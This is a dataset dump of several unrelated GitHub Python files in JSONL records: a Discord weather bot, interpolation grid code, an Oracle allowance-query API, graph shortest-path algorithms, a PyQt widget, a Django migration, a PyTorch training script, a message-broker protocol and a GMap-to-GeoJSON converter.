observation = owm.weather_at_place(name)\n weather = observation.get_weather()\n location = observation.get_location()\n get_temperature = weather.get_temperature(unit='celsius')\n get_wind = weather.get_wind()\n\n await eolas.say('Lieu: {}'.format(location.get_name()))\n await eolas.say('Température: {}'.format(get_temperature['temp']) + u'\\N{DEGREE SIGN}C')\n await eolas.say('Vitesse du vent: {}'.format(get_wind['speed']) + ' m/s')\n await eolas.say('Description: {}'.format(weather.get_detailed_status()))\n\n\n# ?cavani - Print a random gif of Cavani.\n@eolas.command()\nasync def cavani():\n cavani_gifs = [\n \"https://media.giphy.com/media/3oKGzl8zDsyKif2xdS/giphy.gif\",\n \"https://media.giphy.com/media/3oKGzi31QTqbppVOjS/giphy.gif\",\n \"https://media.giphy.com/media/l4FsydT8HX6EWau9a/giphy.gif\",\n \"https://media.giphy.com/media/AAvqQob2BUFCo/giphy.gif\",\n \"https://media.giphy.com/media/l1J3Qcd7OmaqfnXQ4/giphy.gif\"]\n\n rand_gif = random.choice(cavani_gifs)\n\n await eolas.say(rand_gif)\n \n \neolas.run('BOT_TOKEN')\n","repo_name":"Mataz/Eolas-Bot","sub_path":"old_mono_file/eolas_bot.py","file_name":"eolas_bot.py","file_ext":"py","file_size_in_byte":6076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31750512139","text":"from numpy import *\r\n\r\n\r\nclass Grid:\r\n\tdef __init__(self, x_min, y_min, dx, dy, l1, l2):\r\n\t\tself.x_min = x_min\r\n\t\tself.y_min = y_min\r\n\t\tself.dx = dx\r\n\t\tself.dy = dy\r\n\t\tself.l1 = l1\r\n\t\tself.l2 = l2\r\n\t\tself.J = 0\r\n\t\tself.data1 = []\r\n\t\tself.data2 = []\r\n\t\tself.x_cell = zeros( (dx+1), dtype = float)\r\n\t\tself.y_cell = zeros( (dy+1), dtype = float)\r\n\t\tfor i in xrange(dx+1):\r\n\t\t\tself.x_cell[i] = self.x_min+l1*i\r\n\t\tfor i in xrange(dy+1):\r\n\t\t\tself.y_cell[i] = self.y_min+l2*i\r\n\t\r\n\tdef get_center_point(self):\r\n\t\tx_centr = (self.x_cell[self.dx]+self.x_min)/2\r\n\t\ty_centr = (self.y_cell[self.dy]+self.y_min)/2\r\n\t\treturn x_centr,y_centr\r\n\t\t\r\n\tdef get_center_points(self):\r\n\t\tself.x_center = zeros( (self.dx), dtype = float)\r\n\t\tself.y_center = zeros( (self.dy), dtype = float)\r\n\t\tself.x_center[0] = self.x_min+self.l1/2\r\n\t\tself.y_center[0] = self.y_min+self.l2/2\r\n\t\tfor i in xrange(self.dx):\r\n\t\t\tself.x_center[i] = self.x_center[0]+self.l1*i\r\n\t\tfor i in xrange(self.dy):\r\n\t\t\tself.y_center[i] = self.y_center[0]+self.l2*i\r\n\t\r\n\tdef get_center_num(self,n):\r\n\t\tfor j in xrange(self.dy):\r\n\t\t\tfor i in xrange(self.dx):\r\n\t\t\t\ts = self.get_cell_num(self.x_center[i], self.y_center[j])\r\n\t\t\t\tif (s == n):\r\n\t\t\t\t\t#print self.x_center[i], self.y_center[j]\r\n\t\t\t\t\treturn self.x_center[i], self.y_center[j]\r\n\t\t\t\t\tbreak\r\n\t\r\n\tdef add_point(self, x, y):\r\n\t\tself.data1.append(x)\r\n\t\tself.data2.append(y)\r\n\t\tself.get_j(x, y)\r\n\t\r\n\tdef get_cell_num(self, x, y):\r\n\t\ti_x = 0\r\n\t\ti_y = 0\r\n\t\tN = 0\r\n\t\tfor i in xrange(self.dx):\r\n\t\t\tif (x>self.x_cell[i]):\r\n\t\t\t\ti_x = i\r\n\t\tfor i in xrange(self.dy):\r\n\t\t\tif (y>self.y_cell[i]):\r\n\t\t\t\ti_y = i\r\n\t\tN = i_y*self.dx + i_x\r\n\t\treturn N\r\n\t\r\n\tdef get_point_num(self, n):\r\n\t\tN = 0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\ts = self.get_cell_num(self.data1[i], self.data2[i])\r\n\t\t\tif (s == n):\r\n\t\t\t\tN = N + 1\r\n\t\treturn N\r\n\t\r\n\tdef get_j(self, x, y):\r\n\t\tn_1 = self.get_cell_num(x,y)\r\n\t\tn = self.get_point_num(n_1)\r\n\t\tif (n == 1):\r\n\t\t\tself.J = self.J + 1\r\n\r\n\tdef get_weights_cell(self):\r\n\t\tw = zeros( (len(self.data1)), dtype = float)\r\n\t\tn = 0\r\n\t\tn_1 = 0\r\n\t\t#print \"J =\", self.J\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\tn_1 = self.get_cell_num(self.data1[i],self.data2[i])\r\n\t\t\tn = self.get_point_num(n_1)\r\n\t\t\tw[i] = 1./(n*self.J)\r\n\t\treturn w\r\n\t\r\n\tdef calc_e_h(self, x_center, y_center, c):\r\n\t\te_h = 0.0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\te_h = e_h + (sqrt((x_center-self.data1[i])**2+(y_center-self.data2[i])**2))**(-c)\r\n\t\treturn e_h\r\n\t\r\n\tdef calc_h(self, x_center, y_center, j, c):\r\n\t\th = (sqrt((x_center-self.data1[j])**2+(y_center-self.data2[j])**2))**(-c)\r\n\t\treturn h\r\n\t\r\n\tdef calc_hgt(self, x1, y1, x2, y2):\r\n\t\th = sqrt((x2-x1)**2 + (y2-y1)**2)\r\n\t\treturn h\r\n\t\r\n\tdef hgt_calc(self, x0, y0, n_p):\r\n\t\th = zeros( (len(self.data1)), dtype = float)\r\n\t\tj = 0\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\th[j] = self.calc_hgt(x0, y0, self.data1[i], self.data2[i])\r\n\t\t\tj = j+1\r\n\t\th = argsort(h)\r\n\t\th_n = []\r\n\t\tfor i in xrange(n_p):\r\n\t\t\th_n.append(h[i+1])\r\n\t\th_n.sort()\r\n\t\treturn h_n\r\n\t\r\n\tdef get_weights_idw(self, x_center, y_center, c):\r\n\t\tw1 = zeros( (len(self.data1)), dtype = float)\r\n\t\te_h = self.calc_e_h(x_center, y_center, c)\r\n\t\tfor i in xrange(len(self.data1)):\r\n\t\t\th = self.calc_h(x_center, y_center, i, c)\r\n\t\t\tw1[i] = h/e_h\r\n\t\treturn w1\r\n\t\r\n\tdef get_segment_x_middle(self, x1, x2):\r\n\t\tx = 0.0\r\n\t\tx = (x1 + x2)/2\r\n\t\treturn x\r\n\t\r\n\tdef get_segment_y_middle(self, y1, y2):\r\n\t\ty = 0.0\r\n\t\ty = (y1 + y2)/2\r\n\t\treturn y\r\n\t\r\ndef get_rect(array_x, array_y):\r\n\tmin_max = zeros( (4), dtype = float)\r\n\tmin_max[0] = min(array_x) #x(min)\r\n\tmin_max[1] = min(array_y) #y(min)\r\n\tmin_max[2] = max(array_x) #x(max)\r\n\tmin_max[3] = max(array_y) #y(max)\r\n\t\r\n\tfor i in xrange(2):\r\n\t\tmin_max[i] = min_max[i] - 10\r\n\t\tmin_max[i+2] = min_max[i+2] + 10\r\n\t\r\n\t#print min_max\r\n\t\r\n\t# if ((min_max[2]-min_max[0])>(min_max[3]-min_max[1])):\r\n\t\t# min_max[3] = min_max[2] - min_max[0] + min_max[1]\r\n\t# elif ((min_max[2]-min_max[0])<(min_max[3]-min_max[1])):\r\n\t\t# min_max[2] = min_max[3] - min_max[1] + min_max[0]\r\n\treturn min_max\r\n\t\r\n\t\r\ndef stand_weight(w, n):\r\n\tsum = 0.0\r\n\tfor i in xrange(len(w)):\r\n\t\tsum = sum + w[i]\r\n\tfor i in xrange(len(w)):\r\n\t\tw[i] = (w[i]*n)/sum\r\n\treturn w\r\n# n- kol-vo izvestnih tochek\r\n\r\n\r\ndef s_polygon(x, y):\r\n\ts = 0.0\r\n\tn = len(x)\r\n\tfor i in xrange(n):\r\n\t\tif (i == 0):\r\n\t\t\ts = s + x[i]*(y[n-1] - y[i+1])\r\n\t\telif (i == n-1):\r\n\t\t\ts = s + x[i]*(y[i-1] - y[0])\r\n\t\telse:\r\n\t\t\ts = s + x[i]*(y[i-1] - y[i+1])\r\n\ts = 0.5 * abs(s)\r\n\treturn s\r\n\r\n\t\r\ndef s_polygon_1(x, y):\r\n\ts = 0.0\r\n\tn = len(x)\r\n\tfor i in xrange(n):\r\n\t\tif (i == n-1):\r\n\t\t\ts = s + (x[i]*y[0])-(y[i]*x[0])\r\n\t\telse:\r\n\t\t\ts = s + (x[i]*y[i+1])-(y[i]*x[i+1])\r\n\ts = 0.5 * abs(s)\r\n\treturn s\r\n\t\r\n","repo_name":"hpgl/hpgl","sub_path":"src/sample-scripts/solved_problems/shared/decl_grid.py","file_name":"decl_grid.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"37"} +{"seq_id":"6515382635","text":"import cx_Oracle\nimport json\nimport collections\nfrom .readConf import ReadConf\nfrom .login_Postgres import Login_Postgres\n\n\nclass QryAllowanceByEmp:\n def __init__(self):\n pass\n\n def get_data(self, user, password, begin_date, end_date, emp_no):\n ora = ReadConf().ora()\n login = Login_Postgres(user=user, password=password)\n is_login = json.loads(login.login().decode('utf-8'))\n if is_login['login'] == 'True' and ('|csdplan|hrconnect|hr|'.find(user) > 0):\n conn = None\n data = {}\n mmyyyy = end_date[3:]\n try:\n dsn_tns = cx_Oracle.makedsn(ora['server'], ora['port'], ora['service'])\n conn = cx_Oracle.connect(ora['user'], ora['password'], dsn_tns\n , encoding=\"UTF-8\")\n conn.autocommit = False\n cursor = conn.cursor()\n cursor2 = conn.cursor()\n cursor3 = conn.cursor()\n params = {'begin_date': begin_date, 'end_date': end_date}\n cursor.callproc('tonkm_package.QRY_ALLOWANCE_BY_EMP', [emp_no, mmyyyy])\n qryFuelUsed = ReadConf().qryFuelUsed()['Query']\n cursor.execute(qryFuelUsed, params)\n row = cursor.fetchone()\n ngvUsed = row[0]\n dieselUsed = row[1]\n qryStr = ReadConf().qryAllowanceByEmp1()['Query']\n cursor.execute(qryStr, params)\n data = collections.OrderedDict()\n dn = []\n t = collections.OrderedDict()\n for row in cursor:\n t = collections.OrderedDict()\n t['EMP_NO'] = row[0]\n t['WORK_DATE'] = begin_date + ' - ' + end_date\n t['DRIVER'] = row[1]\n t['TEL'] = row[2]\n t['NATIONAL_NO'] = row[3]\n t['TOTAL_DN'] = row[4]\n t['KM_ADJ_LOAD'] = row[5]\n t['KM_ADJ_NOLOAD'] = row[6]\n t['TON_KM_AMT'] = row[7]\n t['FUEL_NGV'] = row[8]\n t['FUEL_DIESEL'] = row[9]\n t['NGV_USED'] = ngvUsed\n t['DIESEL_USED'] = dieselUsed\n t['MULTIDROP'] = row[10]\n t['DIFFICULTY'] = row[11]\n data['TOTAL'] = t\n \"\"\" -------------Loop 2 summary By DN ------------------------ \"\"\"\n qryStr2 = ReadConf().qryAllowanceByEmp2()['Query']\n cursor2.execute(qryStr2, params)\n adj_distance = '-'\n for row2 in cursor2:\n t2 = collections.OrderedDict()\n t2['DN_NO'] = row2[0]\n t2['DN_DATE'] = row2[1]\n t2['TRUCK_NO'] = row2[2]\n t2['ENGINE_TYPE'] = row2[3]\n t2['DESTINATION'] = row2[4]\n t2['TON_KM_AMT'] = row2[5]\n t2['FUEL_NGV'] = row2[6]\n t2['FUEL_DIESEL'] = row2[7]\n t2['FUEL_USED'] = row2[10]\n t2['MULTIDROP'] = row2[8]\n t2['DIFFICULTY'] = row2[9]\n \"\"\"--------------Loop 3 แสดง DN detail ------------\"\"\"\n qryStr3 = ReadConf().qryAllowanceByEmp3()['Query']\n qryStr3 = qryStr3.replace('{{dn_no}}', row2[0])\n cursor3.execute(qryStr3, params)\n dn_detail = []\n for row3 in cursor3:\n t3 = collections.OrderedDict()\n t3['DN_ORDER'] = row3[0]\n t3['PRODUCT'] = row3[1]\n t3['START_PLACE'] = row3[2]\n t3['TO_PLACE'] = row3[3]\n t3['WEIGHT'] = row3[4]\n t3['KM_ADJ'] = row3[5]\n t3['TON_KM_AMT'] = row3[6]\n t3['FUEL_QUAN'] = row3[7]\n t3['FUEL_UNIT'] = row3[8]\n t3['MULTIDROP'] = row3[9]\n t3['DIFFICULTY'] = row3[10]\n t3['TRANS_REMARK'] = row3[11]\n t3['REMARK'] = row3[12]\n t3['ADJ_DISTANCE'] = row3[13]\n if row3[13] == 'adj_distance':\n adj_distance='รอปรับปรุงระยะทาง'\n dn_detail.append(t3)\n t2['ADJ_DISTANCE'] = adj_distance\n t2['ROUTE'] = dn_detail\n dn.append(t2)\n data['DN'] = dn\n cursor.close()\n cursor2.close()\n cursor3.close()\n return json.dumps(data, indent=\" \", ensure_ascii=False).encode('utf-8')\n except cx_Oracle.DatabaseError as e:\n # print(e.args[0].message)\n data['driver'] = e.args[0].message\n data['truck_no'] = 'ไม่พบข้อมูล'\n data['dn_chain'] = 'ไม่พบข้อมูล'\n data['source_point'] = 'ไม่พบข้อมูล'\n data['receiver'] = 'ไม่พบข้อมูล'\n data['ton_km'] = 0\n data['fuel_quan'] = 0\n return json.dumps(data, indent=\" \", ensure_ascii=False).encode('utf-8')\n finally:\n if conn is not None:\n conn.commit()\n conn.close()\n else:\n return json.dumps({'login': 'สิทธิการเข้าถึงข้อมูลถูกจำกัด'}).encode('utf-8')\n\n","repo_name":"sivaroj/svl-api-falcon-freeze","sub_path":"appPackage/QryAllowanceByEmp.py","file_name":"QryAllowanceByEmp.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36314422531","text":"# -----------------------------------------------------------------------------------------------------------------------\n\n# Dijkstra's algorithm:\n# # O(m+n**2)\n# Doesnot work if -ve weights are present\n# -----------------------------------------------------------------------------------------------------------------------\n\n\nclass Graph:\n def __init__(self,num_nodes, edges, weighted=False):\n self.num_nodes = num_nodes\n self.weighted = weighted\n self.data = [[] for _ in range(self.num_nodes)]\n\n for edge in edges:\n n1, n2, w = edge\n self.data[n1].append((n2, w))\n self.data[n2].append((n1, w))\n\n def __repr__(self):\n result = \"\"\n\n for i, v in enumerate(self.data):\n result += f\"{i} -> {v}\"\n\n return result\n\n def __str__(self):\n return self.__repr__()\n\n\n def update_distance(self, distance, current, parent):\n neighbours = self.data[current]\n\n for edge, weight in neighbours:\n if distance[current] + weight < distance[edge]:\n distance[edge] = distance[current] + weight\n parent[edge] = current\n\n\n def pick_next_node(self, visited, distance):\n min_dist = float('inf')\n min_node = None\n\n for i in range(len(distance)):\n if not visited[i] and distance[i] < min_dist:\n min_node = i\n min_dist = distance[i]\n\n return min_node\n\n \n def shortest_path(self, start, target):\n visited = [False] * self.num_nodes\n distance = [float('inf')] * self.num_nodes\n parent = [None] * self.num_nodes\n\n queue = []\n queue.append(start)\n distance[start] = 0\n visited[start] = True\n idx = 0\n\n while idx < len(queue):\n current = queue[idx]\n visited[current] = True\n idx += 1\n\n self.update_distance( distance, current, parent)\n\n next_node = self.pick_next_node(visited, distance)\n if next_node:\n queue.append(next_node)\n\n return distance[target], parent \n\n\n# num_nodes7 = 6\n# edges7 = [(0, 1, 4), (0, 2, 2), (1, 2, 5), (1, 3, 10), (2, 4, 3), (4, 3, 4), (3, 5, 11)]\n\n\n# graph7 = Graph(num_nodes7, edges7,weighted=True)\n# print(graph7)\n\n# print(graph7.shortest_path( 0, 5))\n\n\n# -----------------------------------------------------------------------------------------------------------------------\n\n# Bellman Ford's algorithm:\n# # O(EV)\n# works with -ve weights \n# -----------------------------------------------------------------------------------------------------------------------\n\n\ndef bellman_ford(edges, num_nodes, start):\n distance = [float('inf')] * num_nodes\n distance[start] = 0\n\n for i in range(num_nodes):\n for u,v,w in edges:\n if distance[v] > distance[u] + w:\n distance[v] = distance[u] + w\n\n for u,v,w in edges:\n if distance[v] > distance[u] + w:\n return False, distance\n\n return True, distance\n\n\nnum_nodes6 = 5\nedges6 = [(0, 1, 4), (0, 2, 2), (1, 3, 2), (1, 4, 3), (1, 2, 3), (2, 1, 1), (2, 4, 5), (2, 3, 4), (4, 3, -5)]\n\n\n# graph7 = Graph(num_nodes7, edges7, directed = True, weighted=True)\n# print(graph7)\n\nprint(bellman_ford(edges6, num_nodes6, 0))","repo_name":"akashkumarbtc/Data-Structures-and-Algo","sub_path":"graphs/practise.py","file_name":"practise.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37420563921","text":"from PyQt6.QtWidgets import QWidget, QHBoxLayout\nfrom PyQt6.QtCore import Qt\n\nfrom view.values.EditWidgets import EditFloatSpinBox\n\nfrom msg.Messages import MsgOnLogicDataEdited\nfrom msg.MessageSystem import SendMessage\n\nclass EditFloatValue(QWidget):\n def __init__(self, value):\n super().__init__()\n\n self._val = value\n\n self._rootLayout = QHBoxLayout()\n\n self._floatSpinBox = EditFloatSpinBox()\n self._floatSpinBox.valueChanged.connect(self._signal_floatSpinBox_valueChanged)\n self._rootLayout.addWidget(self._floatSpinBox)\n\n self._rootLayout.setContentsMargins(1, 1, 1, 1)\n self.setLayout(self._rootLayout)\n\n self._pull()\n\n def _signal_floatSpinBox_valueChanged(self, newValue):\n self._push(newValue)\n SendMessage(MsgOnLogicDataEdited(self._val))\n\n def _push(self, data):\n self._val.setVal(data)\n\n def _pull(self):\n data = self._val.getVal()\n self._floatSpinBox.setValue(data)","repo_name":"lastcolour/GamePractice","sub_path":"Sources/Editor/App/view/values/EditFloatValue.py","file_name":"EditFloatValue.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"74258594026","text":"\nimport torch\nimport numpy as np\nfrom torch import optim\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader, dataloader\nfrom torch.utils.data import random_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom torch.optim import lr_scheduler\nimport argparse\nimport wandb\nfrom model import transition_model, transition_model_linear, transition_model_residual, VoltageNet\n\nNUM_EPOCHS = 2000\nLR = 0.001\nSAVE_INTERVAL = 10\nBATCH_SIZE = 1024\nHIDDEN_DIM = 512\n\nclass TransitionDataset(Dataset):\n\n def __init__(self, data):\n self.state = torch.from_numpy(data['state']).to(torch.float32)\n self.q = torch.from_numpy(data['q']).to(torch.float32)\n self.res_v = torch.from_numpy(data['res_v']).to(torch.float32)\n\n def __getitem__(self, index):\n data = torch.cat((self.state[index],self.q[index]),dim=0)\n return data, self.res_v[index]\n def __len__(self):\n return self.state.shape[0]\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description=\"Train rl agent.\")\n parser.add_argument(\"--name\", type=str, nargs=\"?\", help=\"Please input the valid name of an environment scenario.\")\n parser.add_argument(\"--dataset\", type=str, nargs=\"?\")\n parser.add_argument(\"--save-path\", type=str, nargs=\"?\", default=\"./\", help=\"Please enter the directory of saving model.\")\n parser.add_argument(\"--wandb\", action='store_true')\n args = parser.parse_args()\n args.num_epochs = NUM_EPOCHS\n args.lr = LR\n args.save_interval = SAVE_INTERVAL\n args.batch_size = BATCH_SIZE\n args.hidden_dim = HIDDEN_DIM\n return args\n\nif __name__==\"__main__\":\n args = get_args()\n if args.wandb:\n wandb.init(\n project='mapdn_cmdp_transition_model',\n entity=\"chelly\",\n name=args.name,\n group='_'.join(args.name.split('_')[:-1]),\n save_code=True\n )\n wandb.config.update(args)\n wandb.run.log_code('.')\n\n _data = np.load(args.dataset,allow_pickle=True).item()\n dataset = TransitionDataset(_data)\n len_train = int(len(dataset) * 0.8)\n len_val = len(dataset) - len_train\n train_dataset, valid_dataset = random_split(\n dataset=dataset,\n lengths=[len_train, len_val],\n generator=torch.Generator().manual_seed(0)\n )\n train_dataloader = DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, pin_memory=True)\n valid_dataloader = DataLoader(valid_dataset, batch_size=args.batch_size, shuffle=False, pin_memory=True)\n\n # model=transition_model().cuda()\n e_data, e_label = dataset[0]\n input_dim = e_data.shape[-1]\n output_dim = e_label.shape[-1]\n print(\"input_dim = {} output_dim = {}\".format(input_dim, output_dim))\n model=transition_model_residual(input_dim, output_dim, args.hidden_dim).cuda()\n # model = VoltageNet(input_dim, output_dim, args.hidden_dim).cuda()\n\n loss_func=nn.MSELoss()\n optm=torch.optim.Adam(model.parameters(),args.lr)\n scheduler = lr_scheduler.StepLR(optm, step_size=100, gamma=0.8)\n train_epochs_loss = []\n valid_epochs_loss = []\n # acc=acc_func()\n for epoch in range(args.num_epochs):\n train_loss = []\n scheduler.step()\n for idx,(data_x, data_y) in enumerate(train_dataloader,0):\n data_x = data_x.cuda()\n data_y = data_y.cuda()\n outputs = model(data_x)\n optm.zero_grad()\n loss = loss_func(data_y,outputs)\n loss.backward()\n optm.step()\n train_loss.append(loss.item())\n # train_loss.append(loss.item())\n if idx%(len(train_dataloader)//2)==0:\n print(\"epoch={}/{},{}/{}of train, loss={}\".format(\n epoch, NUM_EPOCHS, idx, len(train_dataloader),loss.item()))\n if args.wandb:\n wandb.log({\"train_l2_loss\": np.average(train_loss)},epoch)\n train_epochs_loss.append(np.average(train_loss))\n\n #=====================valid============================\n\n valid_loss = []\n with torch.no_grad():\n for idx,(data_x,data_y) in enumerate(valid_dataloader,0):\n data_x = data_x.cuda()\n data_y = data_y.cuda()\n outputs = model(data_x)\n loss = torch.mean(torch.abs(outputs - data_y))\n valid_loss.append(loss.item())\n print(\"val epoch = {} : {}\".format(epoch,np.average(valid_loss)))\n if args.wandb:\n wandb.log({\"val_l1_loss\": np.average(valid_loss)},epoch)\n if epoch == 0 or np.average(valid_loss) < np.min(valid_epochs_loss):\n path = args.save_path + \"/\"+args.name+\"_best_model\"\n print(\"SAVE best model to {}\".format(path))\n torch.save(model.state_dict(), path)\n valid_epochs_loss.append(np.average(valid_loss))\n\n # if epoch % args.save_interval ==0 :\n # # path = args.scenario + '.res_model{}'.format(epoch)\n # path = args.save_path + \"/res_model_h={}_{}\".format(args.hidden_dim,epoch)\n # print(\"SAVE model to {}\".format(path))\n # torch.save(model.state_dict(), path)\n\n # fig = plt.figure()\n # plt.plot(np.arange(len(train_epochs_loss)), train_epochs_loss)\n # plt.xlabel(\"epoch\")\n # plt.title(\"train_loss\")\n # fig.savefig(args.save_path+\"/\"+args.name+\"_train_loss.png\".format(args.hidden_dim))\n # plt.close()\n\n # fig = plt.figure()\n # plt.plot(np.arange(len(valid_epochs_loss)), valid_epochs_loss)\n # plt.xlabel(\"epoch\")\n # plt.title(\"valid_loss\")\n # fig.savefig(args.save_path+\"/\"+args.name+\"_valid_loss.png\".format(args.hidden_dim))\n # plt.close()\n\n\n\n print(\"Best model : {}\".format(np.min(valid_epochs_loss)))","repo_name":"cjdjr/CMDP4PDN","sub_path":"transition/train_transition.py","file_name":"train_transition.py","file_ext":"py","file_size_in_byte":5789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69978119787","text":"from src.protocols.json_protocol import Json_P\r\nfrom src.protocols.pickle_protocol import Pickle_P\r\nfrom src.protocols.xml_protocol import Xml_P\r\nimport json\r\nimport pickle\r\nimport xml.etree.ElementTree as xml\r\nimport socket\r\n\r\nfrom src.protocols.Serializer import Serializer\r\n\r\nclass Message:\r\n #Message Type.\r\n\r\n def __str__(self):\r\n if self.serialize == 0:\r\n return json.dumps(self.getMessage())\r\n elif self.serialize == 1:\r\n return pickle.dumps(self.getMessage())\r\n \r\n def getMessage(self):\r\n return self.message\r\n \r\nclass SubscribeMessage(Message):\r\n #Message to join a topic\r\n def __init__(self, command, topic, tipo, serialize):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"topic\"] = topic\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n\r\nclass UnsubscribeMessage(Message):\r\n #Message to unjoin a topic\r\n def __init__(self, command, tipo, serialize, topic):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n self.message[\"topic\"] = topic\r\n \r\nclass TextMessage(Message):\r\n #Message to chat with other clients.\r\n def __init__(self, command, message, topic, tipo, serialize):\r\n self.serialize = serialize\r\n self.message = {\"command\":command}\r\n self.message[\"value\"] = message\r\n self.message[\"topic\"] = topic\r\n self.message[\"type\"] = tipo\r\n self.message[\"serialize\"] = serialize\r\n\r\nclass CDProto:\r\n @classmethod\r\n def subscribe(cls, topic: str, tipo, serialize) -> SubscribeMessage:\r\n # Creates a JoinMessage object and returns object\r\n return SubscribeMessage(\"subscribe\", topic, tipo, serialize)\r\n \r\n @classmethod\r\n def unsubscribe(cls, tipo, serialize, topic) -> UnsubscribeMessage:\r\n # Create a UnsubscribeMessage object and returns object \r\n return UnsubscribeMessage(\"unsubscribe\", tipo, serialize, topic)\r\n\r\n @classmethod\r\n def message(cls, value: str, topic: str, tipo: str,serialize) -> TextMessage:\r\n # Creates a TextMessage object and returns object\r\n return TextMessage(\"value\", value, topic, tipo, serialize)\r\n \r\n @classmethod\r\n def send_msg(cls, connection: socket, msg: Message, serialize):\r\n # Choose format\r\n if serialize == Serializer.JSON.value:\r\n Json_P.send_msg(connection, msg)\r\n elif serialize == Serializer.PICKLE.value:\r\n Pickle_P.send_msg(connection, msg)\r\n else:\r\n Xml_P.send_msg(connection, msg)\r\n\r\n @classmethod\r\n def recv_msg(cls, connection: socket) -> Message:\r\n serialize = int.from_bytes(connection.recv(1), 'big')\r\n if serialize == Serializer.JSON.value:\r\n message = Json_P.recv_msg(connection)\r\n elif serialize == Serializer.PICKLE.value:\r\n message = Pickle_P.recv_msg(connection)\r\n else:\r\n message = Xml_P.recv_msg(connection)\r\n\r\n \r\n \r\n if message == None:\r\n return None\r\n\r\n # selecting message type\r\n if message[\"command\"] == \"subscribe\":\r\n return CDProto.subscribe(message[\"topic\"], message[\"type\"], message[\"serialize\"])\r\n\r\n if message[\"command\"] == \"unsubscribe\":\r\n return CDProto.unsubscribe(message[\"type\"], message[\"serialize\"], message[\"topic\"])\r\n \r\n elif message[\"command\"] == \"value\":\r\n return CDProto.message(message[\"value\"], message[\"topic\"], message[\"type\"], message[\"serialize\"])\r\n","repo_name":"fungame2270/Message_broker","sub_path":"src/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6679677079","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('Administrativo', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Reserva',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('Data_da_Reserva', models.DateTimeField()),\n ('Uso_Internet', models.CharField(max_length=1)),\n ('Laboratorio', models.OneToOneField(to='Administrativo.Laboratorio')),\n ('Pacotes', models.ManyToManyField(to='Administrativo.PacoteDeSoftware')),\n ('Tipo_Aula', models.ForeignKey(to='Administrativo.Aula')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"eliomarsantana/SRLab","sub_path":"Usuario/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41334906663","text":"#! /usr/bin/python3\nimport svar\nimport json\nimport argparse\nimport time\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-gmap\",default=\"./map.gmap\",help=\"The input gmap file\")\nparser.add_argument(\"-geojson\",default='matching_graph.json',help=\"The output json file representing matches\")\n \nargs = parser.parse_args()\n\n# generate geojson from gmap\nsvar_gmap=svar.load('svar_gmap')\nqglopm =svar.load('svar_qglopm')\n\ngmap=svar_gmap.load(args.gmap)\nframes=gmap.getFrames()\n\nfeatures=[]\n\n# plot frame viewports\ncamera=frames[0].getCamera()\nfor fr in frames:\n tl=qglopm.from_pixel_to_lla(fr,(0,0))\n tr=qglopm.from_pixel_to_lla(fr,(camera[0],0))\n br=qglopm.from_pixel_to_lla(fr,(camera[0],camera[1]))\n bl=qglopm.from_pixel_to_lla(fr,(0,camera[1]))\n coordinates=[[tl.y,tl.x],[tr.y,tr.x],[br.y,br.x],[bl.y,bl.x]]\n geometry={\"type\": \"Polygon\",\"coordinates\":[coordinates]}\n feature={\"type\": \"Feature\",\"properties\": {},\"geometry\":geometry}\n features.append(feature)\n\n# plot matching graph\nfor fr in frames:\n child_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\n parents=fr.getParents()\n for parent in parents:\n parent_center=qglopm.from_pixel_to_lla(gmap.getFrame(parent['id']),(camera[0]/2,camera[1]/2))\n coordinates=[[parent_center.y,parent_center.x],[child_center.y,child_center.x]]\n geometry={\"type\": \"LineString\",\"coordinates\":coordinates}\n feature={\"type\": \"Feature\",\"properties\": {'stroke':\"#02f740\"},\"geometry\":geometry}\n features.append(feature)\n\n# plot frame centers\nfor fr in frames:\n child_center=qglopm.from_pixel_to_lla(fr,(camera[0]/2,camera[1]/2))\n geometry={\"type\": \"Point\",\"coordinates\":[child_center.y,child_center.x]}\n feature={\"type\": \"Feature\",\"properties\": {\"icon\":\"frame_center.png\"},\"geometry\":geometry}\n features.append(feature)\n\ngeojson={\"type\":\"FeatureCollection\",\"features\":features}\n\nopen(args.geojson,'w').write(json.dumps(geojson,indent=2))\n\n# vis through qglopm plugin\nqapp=qglopm.QApplication()\n\nvis2d= 